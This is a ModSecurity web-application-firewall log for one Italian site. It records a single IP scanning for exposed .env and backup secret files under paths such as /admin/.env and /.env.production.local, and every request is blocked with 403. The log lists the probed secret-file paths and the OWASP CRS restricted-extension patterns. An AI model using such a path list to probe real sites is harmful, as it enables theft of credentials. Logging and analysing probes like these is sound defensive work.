[Thu Nov 27 01:05:19.016165 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADgwAAAAM"]
[Thu Nov 27 01:05:19.017003 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADgwAAAAM"]
[Thu Nov 27 01:05:19.585466 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADhAAAAAM"]
[Thu Nov 27 01:05:19.585722 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADhAAAAAM"]
[Thu Nov 27 01:05:19.585983 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSeVv6FYQXAaYCyOv5ADhAAAAAM"]
[Thu Nov 27 01:05:20.084989 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhQAAAAM"]
[Thu Nov 27 01:05:20.085385 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhQAAAAM"]
[Thu Nov 27 01:05:20.085642 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhQAAAAM"]
[Thu Nov 27 01:05:20.793118 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhgAAAAM"]
[Thu Nov 27 01:05:20.793361 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhgAAAAM"]
[Thu Nov 27 01:05:20.793582 2025] [:error] [pid 350847] [client 195.178.110.157:37414] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSeVwKFYQXAaYCyOv5ADhgAAAAM"]
[Thu Nov 27 01:05:22.751256 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSeVws3-J6_qDUnxDyQShgAAAAE"]
[Thu Nov 27 01:05:22.751382 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSeVws3-J6_qDUnxDyQShgAAAAE"]
[Thu Nov 27 01:05:22.751595 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSeVws3-J6_qDUnxDyQShgAAAAE"]
[Thu Nov 27 01:05:22.751783 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSeVws3-J6_qDUnxDyQShgAAAAE"]
[Thu Nov 27 01:05:25.383059 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSeVxc3-J6_qDUnxDyQSigAAAAE"]
[Thu Nov 27 01:05:25.383315 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSeVxc3-J6_qDUnxDyQSigAAAAE"]
[Thu Nov 27 01:05:25.383496 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSeVxc3-J6_qDUnxDyQSigAAAAE"]
[Thu Nov 27 01:05:26.251029 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSiwAAAAE"]
[Thu Nov 27 01:05:26.251367 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSiwAAAAE"]
[Thu Nov 27 01:05:26.251601 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSiwAAAAE"]
[Thu Nov 27 01:05:26.720231 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSjAAAAAE"]
[Thu Nov 27 01:05:26.720489 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSjAAAAAE"]
[Thu Nov 27 01:05:26.720717 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSeVxs3-J6_qDUnxDyQSjAAAAAE"]
[Thu Nov 27 01:05:27.199640 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjQAAAAE"]
[Thu Nov 27 01:05:27.199883 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjQAAAAE"]
[Thu Nov 27 01:05:27.200093 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjQAAAAE"]
[Thu Nov 27 01:05:27.695853 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjgAAAAE"]
[Thu Nov 27 01:05:27.696237 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjgAAAAE"]
[Thu Nov 27 01:05:27.696456 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSeVx83-J6_qDUnxDyQSjgAAAAE"]
[Thu Nov 27 01:05:29.715928 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSeVyc3-J6_qDUnxDyQSkQAAAAE"]
[Thu Nov 27 01:05:29.716198 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSeVyc3-J6_qDUnxDyQSkQAAAAE"]
[Thu Nov 27 01:05:29.716457 2025] [:error] [pid 350835] [client 195.178.110.157:50382] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSeVyc3-J6_qDUnxDyQSkQAAAAE"]
[Thu Nov 27 01:05:33.860522 2025] [:error] [pid 350836] [client 195.178.110.157:55746] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeVzaWtpwlEodVKjNruBwAAAAI"]
[Thu Nov 27 01:05:33.860763 2025] [:error] [pid 350836] [client 195.178.110.157:55746] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeVzaWtpwlEodVKjNruBwAAAAI"]
[Thu Nov 27 01:05:33.861021 2025] [:error] [pid 350836] [client 195.178.110.157:55746] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeVzaWtpwlEodVKjNruBwAAAAI"]
[Thu Nov 27 01:05:37.861994 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeV0VloYoeK3vI2n0LLKgAAAAg"]
[Thu Nov 27 01:05:37.862237 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeV0VloYoeK3vI2n0LLKgAAAAg"]
[Thu Nov 27 01:05:37.862447 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSeV0VloYoeK3vI2n0LLKgAAAAg"]
[Thu Nov 27 01:05:38.853068 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSeV0lloYoeK3vI2n0LLKwAAAAg"]
